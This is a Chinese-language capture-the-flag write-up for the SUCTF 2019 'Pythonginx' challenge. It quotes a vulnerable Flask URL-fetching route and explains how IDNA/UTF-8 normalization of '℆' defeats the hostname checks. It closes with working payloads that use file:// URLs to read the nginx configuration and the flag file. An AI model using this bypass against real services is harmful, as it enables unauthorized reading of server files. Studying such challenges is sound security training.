buuctf-63-[SUCTF 2019]Pythonginx

[SUCTF 2019]Pythonginx

一道关于python解析idna编码与utf-8解码后的字符串的漏洞题目

CVE-2019-9636：urlsplit 不处理 NFKC 标准化

CVE-2019-10160：urlsplit NFKD 标准化漏洞

源码：

@app.route('/getUrl', methods=['GET', 'POST'])
def getUrl():
    url = request.args.get("url")
    host = parse.urlparse(url).hostname
    if host == 'suctf.cc':
        return "我扌 your problem? 111"
    parts = list(urlsplit(url))
    host = parts[1]
    if host == 'suctf.cc':
        return "我扌 your problem? 222 " + host
    newhost = []
    for h in host.split('.'):
        newhost.append(h.encode('idna').decode('utf-8'))
    parts[1] = '.'.join(newhost)
    #去掉 url 中的空格
    finalUrl = urlunsplit(parts).split(' ')[0]
    host = parse.urlparse(finalUrl).hostname
    if host == 'suctf.cc':
        return urllib.request.urlopen(finalUrl).read()
    else:
        return "我扌 your problem? 333"
   
    <!-- Dont worry about the suctf.cc. Go on! -->
    <!-- Do you know the nginx? -->

完整分析过程：

from flask import Flask, Blueprint, request, Response, escape ,render_template
from urllib.parse import urlsplit, urlunsplit, unquote
from urllib import parse
import urllib.request
url ="http://www.baidu.com/index.php"
host = parse.urlparse(url).hostname #第一次host
print("第一次host:",host)
parts = list(urlsplit(url))
print("parts:",parts)
host = parts[1]  #第二次host
print("第二次host:",host)
newhost = []
print("以点分割：",host.split('.')) #以.为分隔符返回一个列表
for h in host.split('.'):
    newhost.append(h.encode('idna').decode('utf-8')) #漏洞产生点
print("经过idna编码与utf-8解码后newhost:",newhost)
parts[1] = '.'.join(newhost)
#去掉 url 中的空格
finalUrl = urlunsplit(parts).split(' ')[0]
host = parse.urlparse(finalUrl).hostname  #第三次host
print("第三次host:",host)

这里说说host与hostname吧

host=hostname+':'+port(not 80)

如果http使用默认的80端口，host可以省略掉冒号+端口，看上去和hostname一样

1	host = parse.urlparse(url).hostname

这一行获取我们的hostname 并且需要有协议才行比如https://,http://,或者file://，这样才能获取到我们的hostname，也就是payload形式，必须也是这样包含协议的形式

具体分割部分，可以去看官方手册https://docs.python.org/zh-cn/3/library/urllib.parse.html?highlight=urlsplit

输出：

目标绕开第一第二个if，那么操作点就在这里

1 2	for h in host.split('.'): newhost.append(h.encode('idna').decode('utf-8'))

比如℆ 这个字符经过以上操作之后就变为了c/u

那么我们就可以让题目需要的suctf.cc改为suctf.c ℆ 然后经过idna编码utf-8解码后，变为我们需要的suctf.cc/u

还需要了解一些关于nginx的重要文件位置：

配置文件存放目录：/etc/nginx
主配置文件：/etc/nginx/conf/nginx.conf
管理脚本：/usr/lib64/systemd/system/nginx.service
模块：/usr/lisb64/nginx/modules
应用程序：/usr/sbin/nginx
程序默认存放位置：/usr/share/nginx/html
日志默认存放位置：/var/log/nginx
配置文件目录为：/usr/local/nginx/conf/nginx.conf

先来找flag文件的位置，看了wp

payload:?url=file://suctf.c℆sr/local/nginx/conf/nginx.conf

读就行了?url=file://suctf.c℆sr/fffffflag